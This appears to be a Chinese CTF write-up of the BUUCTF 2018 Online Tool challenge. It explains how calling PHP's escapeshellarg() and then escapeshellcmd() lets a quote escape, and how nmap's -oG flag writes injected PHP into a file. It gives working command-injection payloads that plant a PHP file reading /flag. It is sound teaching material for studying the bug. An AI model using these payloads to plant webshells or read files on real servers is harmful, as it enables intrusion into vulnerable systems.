<p>**escapeshellarg()**将给字符串增加一个单引号并且能引用或者转义任何已经存在的单引号，这样以确保能够直接将一个字符串传入 shell 函数，并且还是确保安全的。对于用户输入的部分参数就应该使用这个函数。shell 函数包含<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/function.exec.php">exec()</a>、<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/function.system.php">system()</a> 和<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/language.operators.execution.php">执行运算符</a> 。</p>
<p>在 Windows 上，<strong>escapeshellarg()</strong> 用空格替换了百分号、感叹号（延迟变量替换）和双引号，并在字符串两边加上双引号。此外，每条连续的反斜线(<code>\</code>)都会被一个额外的反斜线所转义。</p>
</blockquote>
<p><em>言外之意，就是看到了一个字符串，先用单引号括起来，然后对于其中已有的引号再进行反斜线转义，并用单引号括起来进行引用。</em></p>
<p>最后这一句告诉咱们Windows上边是绝对试不出来正确的结果的，要使用外界的PHP线上运行环境。<br><a target="_blank" rel="noopener" href="https://www.jyshare.com/compile/1/">菜鸟</a></p>
<h2 id="escapeshellcmd"><a href="#escapeshellcmd" class="headerlink" title="escapeshellcmd()"></a>escapeshellcmd()</h2><p><img src="/../image/BUUCTF2018-OnlineTool1-1.png" alt="img"></p>
<p>言外之意就是把字符串中的特殊字符使用反斜线转译掉</p>
<hr>
<p>所以下边就是相应的原理</p>
<p><strong>下面回到题目，可以发现体中有一个函数<code>system</code>来执行的我们的nmap命令，由于管道等命令全都用不了了，</strong></p>
<p><strong>nmap有一个参数-oG可以实现将命令和结果写到文件</strong></p>
<p><strong>所以我们可以控制自己的输入写入文件，这里我们可以写入一句话木马链接，也可以直接命令 cat flag，构造paload：?host&#x3D;’ <?php echo `cat /flag`;?> -oG test.php ‘</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$host</span>=<span class="hljs-string">&quot;&#x27; &lt;?php phpinfo();?&gt; -oG test.php &#x27;&quot;</span>;<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$host</span>.<span class="hljs-string">&quot;                     &quot;</span>;<br><span class="hljs-variable">$h</span> = <span class="hljs-title function_ invoke__">escapeshellarg</span>(<span class="hljs-variable">$host</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$h</span>.<span class="hljs-string">&quot;                     &quot;</span>;<br><span class="hljs-variable">$h</span> = <span class="hljs-title function_ invoke__">escapeshellcmd</span>(<span class="hljs-variable">$h</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$h</span>.<span class="hljs-string">&quot;                &quot;</span>;<br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;                        nmap -T5 -sT -Pn --host-timeout 2 -F &quot;</span>.<span class="hljs-variable">$h</span>;<br><span class="hljs-meta">?&gt;</span><br><br></code></pre></td></tr></table></figure>

<figure class="highlight php-template"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs php-template"><span class="language-xml">&#x27; </span><span class="language-php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-title function_ invoke__">phpinfo</span>();<span class="hljs-meta">?&gt;</span></span><span class="language-xml"> -oG test.php &#x27;                     </span><br><span class="language-xml">&#x27;&#x27;\&#x27;&#x27; </span><span class="language-php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-title function_ invoke__">phpinfo</span>();<span class="hljs-meta">?&gt;</span></span><span class="language-xml"> -oG test.php &#x27;\&#x27;&#x27;&#x27;                     </span><br><span class="language-xml">&#x27;&#x27;\\&#x27;&#x27; \&lt;\?php phpinfo\(\)\;\?\&gt; -oG test.php &#x27;\\&#x27;&#x27;&#x27;</span><br><span class="language-xml">//下面的这个等价于</span><br><span class="language-xml">nmap -T5 -sT -Pn --host-timeout 2 -F &#x27;&#x27;\\&#x27;&#x27; \&lt;\?php phpinfo\(\)\;\?\&gt; -oG test.php &#x27;\\&#x27;&#x27;&#x27;</span><br><span class="language-xml">=&gt;</span><br><span class="language-xml">nmap -T5 -sT -Pn --host-timeout 2 -F \\ \&lt;\?php phpinfo\(\)\;\?\&gt; -oG test.php &#x27;\\&#x27;</span><br><span class="language-xml"></span><br><span class="language-xml"></span><br><span class="language-xml">就目前来看可以看到\都没有了只剩下了</span><span class="language-php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-title function_ invoke__">phpinfo</span>();<span class="hljs-meta">?&gt;</span></span><br></code></pre></td></tr></table></figure>

<p>可以注意到，如果后边没有空格的话，<code>\\</code>就会和<code>php</code>连在一起，这个时候无法正确解析，所以必须有空格。</p>
<p>最终payload：</p>
<figure class="highlight php-template"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php-template"><span class="language-xml">?host=&#x27; </span><span class="language-php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">echo</span> `cat /flag`;<span class="hljs-meta">?&gt;</span></span><span class="language-xml"> -oG hack.php &#x27;</span><br></code></pre></td></tr></table></figure>

<p>由于chdir($sandbox);，需要改变目录访问</p>
<p>GET方法提交后会显示当前的工作目录，然后访问url&#x2F;工作目录&#x2F;hack.php即可看到flag</p>
<hr>
<h2 id="知识点："><a href="#知识点：" class="headerlink" title="知识点："></a>知识点：</h2><h2 id="escapeshellarg-1"><a href="#escapeshellarg-1" class="headerlink" title="escapeshellarg()"></a>escapeshellarg()</h2><blockquote>
<p>**escapeshellarg()**将给字符串增加一个单引号并且能引用或者转义任何已经存在的单引号，这样以确保能够直接将一个字符串传入 shell 函数，并且还是确保安全的。对于用户输入的部分参数就应该使用这个函数。shell 函数包含<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/function.exec.php">exec()</a>、<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/function.system.php">system()</a> 和<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/language.operators.execution.php">执行运算符</a> 。</p>
<p>在 Windows 上，<strong>escapeshellarg()</strong> 用空格替换了百分号、感叹号（延迟变量替换）和双引号，并在字符串两边加上双引号。此外，每条连续的反斜线(<code>\</code>)都会被一个额外的反斜线所转义。</p>
</blockquote>
<p><em>言外之意，就是看到了一个字符串，先用单引号括起来，然后对于其中已有的引号再进行反斜线转义，并用单引号括起来进行引用。</em></p>
<p>最后这一句告诉咱们Windows上边是绝对试不出来正确的结果的，要使用外界的PHP线上运行环境。<br><a target="_blank" rel="noopener" href="https://www.jyshare.com/compile/1/">菜鸟</a></p>
<h2 id="escapeshellcmd-1"><a href="#escapeshellcmd-1" class="headerlink" title="escapeshellcmd()"></a>escapeshellcmd()</h2><p><img src="/../image/BUUCTF2018-OnlineTool1-1.png" alt="img"></p>
<p>言外之意就是把字符串中的特殊字符使用反斜线转译掉</p>
<p><strong>这俩函数一起用并且顺序是先escapeshellarg()后escapeshellcmd()就会导致单引号逃逸</strong></p>
<hr>
<h2 id="nmap-oG"><a href="#nmap-oG" class="headerlink" title="nmap -oG"></a>nmap -oG</h2><ul>
<li>**<code>-oN/-oX/-oS/-oG &lt;file&gt;</code>**：以不同格式输出：普通、XML、scrIpt kIddi3和可grep格式。</li>
</ul>
<p><strong>-oG该参数实现将命令和结果写到文件</strong></p>
<p>例如：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">nmap -T5 -sT -Pn --host-timeout <span class="hljs-number">2</span> -F <span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">echo</span> `cat /flag`;<span class="hljs-meta">?&gt;</span> -oG hack.php<br></code></pre></td></tr></table></figure>






      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。 </span>
    </div>
</article>





    <div id="comments">
    <script>
        {
            const comments = document.getElementById("comments");
            const script = document.createElement("script");
            script.src = "https://giscus.app/client.js";
            script.setAttribute('data-repo', "MIXBP/MIXBP.github.io");
            script.setAttribute('data-repo-id', "R_kgDONYaZsg");
            script.setAttribute('data-category', "Announcements");
            script.setAttribute('data-category-id', "DIC_kwDONYaZss4ClAnT");
            script.setAttribute('data-mapping', "pathname");
            script.setAttribute('data-strict', "0");
            script.setAttribute('data-reactions-enabled', "1");
            script.setAttribute('data-emit-metadata', "0");
            script.setAttribute('data-input-position', "top");
            script.setAttribute('data-theme', "noborder_dark");
            script.setAttribute('data-lang', "zh-CN");
            script.setAttribute('data-loading', "lazy");
            script.setAttribute('crossorigin', "anonymous");
            script.setAttribute('async', "");
            comments.appendChild(script);
        }
    </script>
</div>



    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    ©MIXBP 2024
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="Toggle full screen shortcut key s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    #post {
        background: url(/img/background.jpg);
    }
    
    
    #post .index {
        background: url(/img/background2.jpg);
    }
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    
    .nav-right:before {
        content: ' ';
        display: block;
        position: absolute;
        left: 0;
        top: 0;
        width: 100%;
        height: 100%;
        opacity: 0.5;
        background: url("/img/bjtp.jpg");
        background-repeat: no-repeat;
        background-position: 50% 0;
        -ms-background-size: cover;
        -o-background-size: cover;
        -moz-background-size: cover;
        -webkit-background-size: cover;
        background-size: cover;
    }
    

    
</style>






<div class="mobile-menus-out" >

</div>
<div class="mobile-menus">
    
    
    
    <a class="dynamic-menu " target="_self"   href="https://mixbp.github.io/">MIXBP</a>
    
    
    <a class="dynamic-menu " target="_blank"  href="https://mixbp.github.io/">github</a>
    
</div>


</html>
